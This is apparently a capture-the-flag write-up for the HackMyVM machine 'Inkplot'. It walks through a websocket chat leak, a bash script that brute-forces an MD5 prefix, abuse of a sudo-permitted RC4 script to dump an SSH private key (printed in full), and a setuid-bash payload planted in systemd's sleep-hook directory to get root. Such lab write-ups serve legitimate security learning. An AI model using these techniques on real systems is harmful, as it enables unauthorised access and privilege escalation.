{"id":604,"date":"2024-04-22T15:06:26","date_gmt":"2024-04-22T07:06:26","guid":{"rendered":"http:\/\/162.14.82.114\/?p=604"},"modified":"2024-04-22T15:06:26","modified_gmt":"2024-04-22T07:06:26","slug":"hmv-_-inkplot","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/604\/04\/22\/2024\/","title":{"rendered":"hmv[-_-]Inkplot"},"content":{"rendered":"<h1>Inkplot<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221503465.png\" alt=\"image-20240422132002993\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221503540.png\" alt=\"image-20240422132155403\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.147 -- -A\n\nOpen 192.168.0.147:22\nOpen 192.168.0.147:3000\n\nPORT     STATE SERVICE   REASON  VERSION\n22\/tcp   open  ssh       syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n3000\/tcp open  websocket syn-ack Ogar agar.io server\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ curl http:\/\/192.168.0.147:3000                                                                                           \nUpgrade Required<\/code><\/pre>\n<p>Looking into this port: <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/h2c-smuggling#websocket-smuggling\">https:\/\/book.hacktricks.xyz\/pentesting-web\/h2c-smuggling#websocket-smuggling<\/a><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221504792.png\" alt=\"image-20240422150418040\" style=\"zoom:50%;\" \/><\/p>\n<p>This matches what we found, so we keep gathering information:<\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/websocket-attacks\">https:\/\/book.hacktricks.xyz\/pentesting-web\/websocket-attacks<\/a><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221504875.png\" alt=\"image-20240422132834482\" style=\"zoom:50%;\" \/><\/p>\n<h3>Brute-Forcing the Hash<\/h3>\n<p>Try connecting with a <a href=\"https:\/\/github.com\/vi\/websocat\/releases\/download\/v1.12.0\/websocat.x86_64-unknown-linux-musl\">prebuilt binary<\/a>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ .\/websocat.x86_64-unknown-linux-musl ws:\/\/192.168.0.147:3000\nWelcome to our InkPlot secret IRC server\nBob: Alice, ready to knock our naive Leila off her digital pedestal?\nAlice: Bob, I&#039;ve been dreaming about this for weeks. Leila has no idea what&#039;s about to hit her.\nBob: Exactly. 
We&#039;re gonna tear her defense system apart. She won&#039;t see it coming.\nAlice: Poor Leila, always so confident. Let&#039;s do this.\nBob: Alice, I&#039;ll need that MD5 hash to finish the job. Got it?\nAlice: Yeah, I&#039;ve got it. Time to shake Leila&#039;s world.\nBob: Perfect. Release it.\nAlice: Here it goes: d51540...\n*Alice has disconnected*\nBob: What?! Damn it, Alice?! Not now!\nLeila: clear<\/code><\/pre>\n<p>This roughly means that the <code>MD5 hash<\/code> begins with <code>d51540<\/code>, so we write a script to brute-force it:<\/p>\n<pre><code class=\"language-shell\">#!\/bin\/bash\n# Known prefix of the MD5 hash leaked in the chat\nflag=&quot;d51540&quot;\n\n# Read candidate words, one per line, from the wordlist given as $1\nwhile IFS= read -r word; do\n    # echo appends a newline, so this is the MD5 of the word followed by a newline\n    hash=$(echo &quot;$word&quot; | md5sum | cut -d &quot; &quot; -f 1)\n    if [[ $hash == $flag* ]]; then\n        echo &quot;[+]I got it! PASS: $word, HASH: $hash&quot;\n    fi\ndone &lt; &quot;$1&quot;<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ .\/brute.sh \/usr\/share\/wordlists\/rockyou.txt\n[+]I got it! PASS: palmira, HASH: d515407c6ec25b2a61656a234ddf22bd\n[+]I got it! 
PASS: intelinside, HASH: d51540c4ecaa62b0509f453fee4cd66b<\/code><\/pre>\n<p>Try logging in with it!<\/p>\n<pre><code class=\"language-apl\">leila\nintelinside<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221504578.png\" alt=\"image-20240422135901737\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ ls -la\ntotal 48\ndrwx---r-x  5 leila leila 4096 Apr 22 07:59 .\ndrwxr-xr-x  4 root  root  4096 Jul 28  2023 ..\n-rw-r--r--  1 leila leila  220 Jul 28  2023 .bash_logout\n-rw-r--r--  1 leila leila 3526 Jul 28  2023 .bashrc\n-rw-------  1 leila leila   20 Aug  1  2023 .lesshst\ndrwxr-xr-x  3 leila leila 4096 Jul 28  2023 .local\ndrwxr-xr-x 12 leila leila 4096 Jul 28  2023 .oh-my-zsh\n-rw-r--r--  1 leila leila  807 Jul 28  2023 .profile\ndrwx------  2 leila leila 4096 Jul 28  2023 .ssh\n-rw-r--r--  1 leila leila  169 Apr 22 07:58 .wget-hsts\n-rw-------  1 leila leila   22 Apr 22 07:59 .zsh_history\n-rw-r--r--  1 leila leila 3890 Jul 28  2023 .zshrc\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ncrom:x:1001:1001:,,,:\/home\/crom:\/bin\/zsh\npauline:x:1000:1000:,,,:\/home\/pauline:\/bin\/zsh\nwebsocat:x:103:111::\/nonexistent:\/usr\/sbin\/nologin\nleila:x:1003:1003:,,,:\/home\/leila:\/bin\/zsh\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ cat \/etc\/shadow \ncat: \/etc\/shadow: Permission denied\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ sudo -l                                                                                                                                         1 \u21b5\nMatching Defaults entries for leila on inkplot:\n    env_reset, mail_badpass, 
secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser leila may run the following commands on inkplot:\n    (pauline : pauline) NOPASSWD: \/usr\/bin\/python3 \/home\/pauline\/cipher.py*\n\ncat: \/home\/pauline\/cipher.py\/: Not a directory\n\u256d\u2500leila@inkplot ~ \n\u2570\u2500$ cat \/home\/pauline\/cipher.py                                                                                                                     1 \u21b5\nimport os\nimport json\nimport argparse\nfrom Crypto.Cipher import ARC4\nimport base64\n\nwith open(&#039;\/home\/pauline\/keys.json&#039;, &#039;r&#039;) as f:\n    keys = json.load(f)\n\ncrypt_key = keys[&#039;crypt_key&#039;].encode()\n\ndef encrypt_file(filepath, key):\n    with open(filepath, &#039;rb&#039;) as f:\n        file_content = f.read()\n\n    cipher = ARC4.new(key)\n    encrypted_content = cipher.encrypt(file_content)\n\n    encoded_content = base64.b64encode(encrypted_content)\n\n    base_filename = os.path.basename(filepath)\n\n    with open(base_filename + &#039;.enc&#039;, &#039;wb&#039;) as f:\n        f.write(encoded_content)\n\n    return base_filename + &#039;.enc&#039;\n\ndef decrypt_file(filepath, key):\n    with open(filepath, &#039;rb&#039;) as f:\n        encrypted_content = f.read()\n\n    decoded_content = base64.b64decode(encrypted_content)\n\n    cipher = ARC4.new(key)\n    decrypted_content = cipher.decrypt(decoded_content)\n\n    return decrypted_content\n\nparser = argparse.ArgumentParser(description=&#039;Encrypt or decrypt a file.&#039;)\nparser.add_argument(&#039;filepath&#039;, help=&#039;The path to the file to encrypt or decrypt.&#039;)\nparser.add_argument(&#039;-e&#039;, &#039;--encrypt&#039;, action=&#039;store_true&#039;, help=&#039;Encrypt the file.&#039;)\nparser.add_argument(&#039;-d&#039;, &#039;--decrypt&#039;, action=&#039;store_true&#039;, help=&#039;Decrypt the file.&#039;)\n\nargs = parser.parse_args()\n\nif 
args.encrypt:\n    encrypted_filepath = encrypt_file(args.filepath, crypt_key)\n    print(&quot;The encrypted and encoded content has been written to: &quot;)\n    print(encrypted_filepath)\nelif args.decrypt:\n    decrypt_key = input(&quot;Please enter the decryption key: &quot;).encode()\n    decrypted_content = decrypt_file(args.filepath, decrypt_key)\n    print(&quot;The decrypted content is: &quot;)\n    print(decrypted_content)\nelse:\n    print(&quot;Please provide an operation type. Use -e to encrypt or -d to decrypt.&quot;)<\/code><\/pre>\n<p>Roughly, the script encrypts the file content with <code>RC4<\/code>, then <code>base64<\/code>-encodes it and stores the result as an <code>enc<\/code> file. The first idea was to encrypt and then decrypt, but unfortunately we do not have the key. I heard from more experienced players that RC4 has a very neat property:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221504811.png\" alt=\"image-20240422143010178\" style=\"zoom:50%;\" \/><\/p>\n<p>Encrypting twice restores the original: RC4 is a stream cipher that XORs the data with a keystream derived from the key, so a second pass with the same key cancels the first. We use this to read the SSH private key:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -l\nMatching Defaults 
entries for leila on inkplot:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser leila may run the following commands on inkplot:\n    (pauline : pauline) NOPASSWD: \/usr\/bin\/python3 \/home\/pauline\/cipher.py*\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -u pauline \/usr\/bin\/python3 \/home\/pauline\/cipher.py\nusage: cipher.py [-h] [-e] [-d] filepath\ncipher.py: error: the following arguments are required: filepath\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -u pauline \/usr\/bin\/python3 \/home\/pauline\/cipher.py -e \/home\/pauline\/.ssh\/id_rsa                                                           2 \u21b5\nThe encrypted and encoded content has been written to: \nid_rsa.enc\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ cat id_rsa.enc | base64 -d &gt; new_id_rsa.enc\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ sudo -u pauline \/usr\/bin\/python3 \/home\/pauline\/cipher.py -e new_id_rsa.enc           \nThe encrypted and encoded content has been written to: \nnew_id_rsa.enc.enc\n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ cat new_id_rsa.enc.enc                     \n%                       \n\u256d\u2500leila@inkplot \/tmp \n\u2570\u2500$ cat new_id_rsa.enc.enc | base64 -d\n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEArstJauKY8iDoZ1szhWBOMOcer1ns14OgabV4yGuWbLSXj\/kzjCRE\nUcMu61sUYLd3NFK4JAdScTsZFaVb2ll7grwrSWXEVQL3t4K6TnZzJs6b7bkMpJ2DjPvAa7\nKimRoRg02maHKPMZCkxE0cE6OoldmhnQYr1Ou22MzEBTzpjamwcPb+wwgLPFvmDxwx6zUt\nJqlBAowHuk+nsHwCVuwy4ucUHvxwsQy6D+n5hBW6gSSEpNUakxrte24kDY7c5NTkcsFjGG\nOYmhK\/UgUtmQVn0+1QDcRCD2Nw56J7Yd4d1KP+1BPVWR72amzFR4VOn1Tr2Xw6wQLFITan\nhUjshsaz1nu0WPU9roipSNxWQYmA7mZE0AOoZPYm1RUS+AdsisQ6d9BBQRlFooCzBWarBA\nm5jSv2DX8q0tZN5Ey+SbCCiETVt6et4LWgtFp9UPAga3dTSR0vL2bVq9XNhjNzhY+nCrPS\nHsWwhHTgd+b2nxZdrNBuTmsuOm4+JJBK7aloD+15AAAFiN0ijCzdIowsAAAAB3NzaC1yc2\nEAAAGBAK7LSWrimPIg6GdbM4VgTjDnHq9Z7NeDoGm1eMhrlmy0l4\/5M4wkRFHDLutbFGC3\ndzRSuCQHUnE7GRWlW9pZe4K8K0llxFUC97eCuk52cybOm+25DKSdg4z7wGuyopkaEYNNpm\nhyjzGQpMRNHBOjqJXZoZ0GK9TrttjMxAU86Y2psHD2\/sMICzxb5g8cMes1LSapQQKMB7pP\np7B8AlbsMuLnFB78cLEMug\/p+YQVuoEkhKTVGpMa7XtuJA2O3OTU5HLBYxhjmJoSv1IFLZ\nkFZ9PtUA3EQg9jcOeie2HeHdSj\/tQT1Vke9mpsxUeFTp9U69l8OsECxSE2p4VI7IbGs9Z7\ntFj1Pa6IqUjcVkGJgO5mRNADqGT2JtUVEvgHbIrEOnfQQUEZRaKAswVmqwQJuY0r9g1\/Kt\nLWTeRMvkmwgohE1benreC1oLRafVDwIGt3U0kdLy9m1avVzYYzc4WPpwqz0h7FsIR04Hfm\n9p8WXazQbk5rLjpuPiSQSu2paA\/teQAAAAMBAAEAAAGASx1yNfwd1QOeS\/hN6jXKNErGDX\n38AVt\/3p2NQ7e0Y4+yCD2D0Ogu8eIKcjroRW3iTLp1hooc\/Cr06y\/uCqXkpXh+s6KHni7R\nzGth6+EMODOWn7CjxcQo6bewZ7fTFy80MnR2nDEK5zZtECzA8ZGlm4v0XzntMSmAoKdSX5\nvfFDFFcS47qg11YqFterXXn+fwuMoIdXM+yOp9OiL4kGkdrxO1umEqfnNlK\/yU7RW3WdMb\nK4imzGvIfYAF\/0uTEsWHlWj\/Xh9ZIIws196Kej45NwC6Lj6RhAD3RnJB6eIEekzqHXD5jv\n200XOJ96tve\/lwKlE2egVGlDfXFDy\/QU5YzBGm8Ugw5aoY\/wWDuDmNb4mT4x5GGCVhqTKY\ng9JiBZFPrdHXFrZxmJRpJKkP3wlLiSXsBPGaLZ3qDYUk\/OyTs5HMDJh5030RzBZyXodMrt\n79QsjPKqsVR\/gzagzCl7maStU307kLeEByCd4f2R49b0Up7DQvk7lu\/00bHvaAUG+\/AAAA\nwQCqqhl4jgC+0bv+gHcFtTvSr1ITgGc5psFHwWbNtwQAGjxbyK4GqeU35rF6ohNIt7usAB\nACkb2hRY2U+PPE3M2GsMpPbrWyf0JTgwC83Hw5hE7ibP4QYK2yAn409zUnw6KAN0tuSTby\nQtraVuq0TJeYU3noVJUfFms0x1QAHBcxM9Z9k+1+ujXlcZik9C3qhEAUdTxikLxjTOaEhW\nW6y41kV78G546cgUcjROBu21
zYsY0G8tPjobtSzuW+HkokymoAAADBAPJUK+CouVydEmo2\nn9RNYb9xX4J0PQgky60EQx5xqeALWhHqJXetmzgyAm2rluGA+4u0ecyyVA7XK1SyNdENHk\nTb3NNCzZvjfHHrfDm3w799PVP3dAhpI3Jb1kFd3HyMDaFIF3p1Kx\/Gb8UyOqliLh9wOWMa\nruvS4FvOlfW7Y9uYkiM8ZHtxUcYEej7qTbJf4PMtDqD8P86jLO1yUy57JU10nr2U3hbYFF\nGxgp2cUGg+kKlXq9JKrlbzaDnZJEw6owAAAMEAuKe\/LnhWTbIgw29mGRobflSiPZQ9mQ7+\niEWQWw7FOWp8iG7OQ3buFMCvpsafje8+PL4bV0uKmI6alK2InqGlN7jt+FYLCDugsmUwiA\nA6KrlsFXtPv\/BOo6LK5Ye6OTYIQnIRF5gkpUJ1FuPSQ4dPxwlI740OHAiB7BHNgJQhd+El\nsYwMBrhupNDNOjGIsb2t5y\/\/OEGw4gif4FbhD9GqOcgDmYoXSPxqLUB8diupPUGUHUBOSp\naDfAD8yhiUmbUzAAAADnBhdWxpbmVAZGViaWFuAQIDBA==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Then use this key to log in:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ vim inkplot   \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ chmod 600 inkplot                          \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ ssh pauline@192.168.0.147 -i inkplot  \nAuto-standby now activated after 2 min of inactivity\nLinux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\n[oh-my-zsh] Would you like to update? 
[Y\/n] Y<\/code><\/pre>\n<p>We have escalated to a new user!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221504692.png\" alt=\"image-20240422144109980\" style=\"zoom:50%;\" \/><\/p>\n<h3>Escalating to root<\/h3>\n<pre><code class=\"language-bash\">\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ ls -la\ntotal 60\ndrwx---r-x  5 pauline pauline 4096 Apr 22 08:41 .\ndrwxr-xr-x  4 root    root    4096 Jul 28  2023 ..\n-rw-r--r--  1 pauline pauline  220 Jul 22  2023 .bash_logout\n-rw-r--r--  1 pauline pauline 3526 Jul 22  2023 .bashrc\n-rw-r--r--  1 pauline pauline 1738 Aug  1  2023 cipher.py\n-rw-r-----  1 pauline pauline   44 Jul 25  2023 keys.json\n-rw-------  1 pauline pauline   20 Aug  1  2023 .lesshst\ndrwxr-xr-x  3 pauline pauline 4096 Jul 22  2023 .local\ndrwxr-xr-x 12 pauline pauline 4096 Apr 22 08:40 .oh-my-zsh\n-rw-r--r--  1 pauline pauline  807 Jul 22  2023 .profile\ndrwx------  2 pauline pauline 4096 Jul 28  2023 .ssh\n-rw-r--r--  1 pauline pauline    0 Jul 25  2023 .sudo_as_admin_successful\n-rwx------  1 pauline pauline   33 Jul 24  2023 user.txt\n-rw-r--r--  1 pauline pauline  169 Apr 22 08:40 .wget-hsts\n-rw-------  1 pauline pauline   66 Apr 22 08:41 .zsh_history\n-rw-r--r--  1 pauline pauline 3890 Jul 22  2023 .zshrc\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cat user.txt 
\na2c145eb8279c2f920de6871bef794fa\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ sudo -l\n[sudo] password for pauline: \nSorry, try again.\n[sudo] password for pauline: \nsudo: 1 incorrect password attempt\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cat .zsh_history                                                                                                                              130 \u21b5\n: 1713768084:0;sudo -l\n: 1713768093:0;clear\n: 1713768094:0;ls -la\n: 1713768097:0;cat user.txt\n: 1713768100:0;sudo -l\n: 1713768121:0;cat .zsh_history\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cat keys.json   \n{\n    &quot;crypt_key&quot;: &quot;aLLtBh0BVCFSvfZ203sM&quot;\n}\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ whoami;id     \npauline\nuid=1000(pauline) gid=1000(pauline) groups=1000(pauline),100(users),1002(admin)\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ find \/ -writable -type f 2&gt;\/dev\/null\n.......<\/code><\/pre>\n<p>It turns out we are actually in the admin group. Let us look for files we can act on, but when I came back from a bathroom break and was about to check, I found:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ \nBroadcast message from root@inkplot (Mon 2024-04-22 08:45:59 CEST):\n\nThe system will suspend now!<\/code><\/pre>\n<p>There is a scheduled task...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ nmap 192.168.0.147   \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-22 02:43 EDT\nNote: Host seems down. 
If it is really up, but blocking our ping probes, try -Pn\nNmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds<\/code><\/pre>\n<p>Well... restart the target machine:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ find \/ -group admin 2&gt;\/dev\/null\n\/usr\/lib\/systemd\/system-sleep<\/code><\/pre>\n<blockquote>\n<p><code>\/usr\/lib\/systemd\/system-sleep<\/code> is a special directory on Linux systems, managed by <code>systemd<\/code>, that holds scripts executed automatically when the system enters a sleep state (such as suspend to RAM or to disk) or wakes up.<\/p>\n<p>When the system is about to enter a sleep state, <code>systemd<\/code> runs all scripts in this directory ending in <code>.needs<\/code> or <code>.wants<\/code>, passing an argument that indicates which sleep state the system is about to enter (for example <code>suspend<\/code>, <code>hibernate<\/code> or <code>hybrid-sleep<\/code>). Likewise, the corresponding scripts are run when the system wakes from sleep.<\/p>\n<p>These scripts are typically used to perform special operations needed when the system sleeps or wakes, for example:<\/p>\n<ul>\n<li>Saving or restoring certain hardware state.<\/li>\n<li>Stopping or restarting certain services.<\/li>\n<li>Updating or clearing caches.<\/li>\n<li>Performing custom operations.<\/li>\n<\/ul>\n<\/blockquote>\n<p>Write a file into this directory:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cd \/usr\/lib\/systemd\/system-sleep                                                                                                                1 \u21b5\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ echo &#039;#!\/bin\/bash&#039; &gt; payload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ echo &#039;chmod +s \/bin\/bash&#039; &gt;&gt; payload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ cat payload                      \n#!\/bin\/bash\nchmod +s \/bin\/bash\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash<\/code><\/pre>\n<p>Then stay idle and wait for the system to lock up:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404221504130.png\" alt=\"image-20240422145654444\" style=\"zoom:50%;\" \/><\/p>\n<p>Restart the target machine:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ ssh pauline@192.168.0.147 -i inkplot \nAuto-standby now activated after 2 min of inactivity\nLinux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Apr 22 08:51:04 2024 from 192.168.0.143\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash<\/code><\/pre>\n<p>It did not work? systemd only runs executable files from this directory, so add execute permission and try again:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ cd \/usr\/lib\/systemd\/system-sleep\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ ls             \npayload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ cat payload                     \n#!\/bin\/bash\nchmod +s \/bin\/bash\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ chmod +x 
payload\n\u256d\u2500pauline@inkplot \/usr\/lib\/systemd\/system-sleep \n\u2570\u2500$ ls -la         \ntotal 20\ndrwxrwx---  2 root    admin    4096 Apr 22 08:52 .\ndrwxr-xr-x 14 root    root    12288 Jul 28  2023 ..\n-rwxr-xr-x  1 pauline pauline    31 Apr 22 08:52 payload<\/code><\/pre>\n<p>Got root!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Inkplot]\n\u2514\u2500$ ssh pauline@192.168.0.147 -i inkplot \nAuto-standby now activated after 2 min of inactivity\nLinux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Apr 22 08:57:55 2024 from 192.168.0.143\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n\u256d\u2500pauline@inkplot ~ \n\u2570\u2500$ bash -p\nbash-5.2# cd \/root\nbash-5.2# ls -la\ntotal 52\ndrwx------  6 root root 4096 Aug  3  2023 .\ndrwxr-xr-x 18 root root 4096 Jul 27  2023 ..\nlrwxrwxrwx  1 root root    9 Jun 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Jul 22  2023 .bashrc\n-rw-------  1 root root   20 Aug  1  2023 .lesshst\ndrwxr-xr-x  3 root root 4096 Aug  1  2023 .local\ndrwxr-xr-x  4 root root 4096 Jul 26  2023 .npm\ndrwxr-xr-x 12 root root 4096 Jul 22  2023 .oh-my-zsh\n-rw-r--r--  1 root root  161 Jul 22  2023 .profile\n-rwx------  1 root root   33 Aug  1  2023 root.txt\n-rw-r--r--  1 root root   66 Jul 22  2023 .selected_editor\ndrwx------  2 root root 4096 Jul 25  2023 .ssh\n-rw-r--r--  1 root root  165 Jul 26  2023 .wget-hsts\nlrwxrwxrwx  1 root root    9 Jul 22  2023 .zsh_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3890 Jul 22  2023 
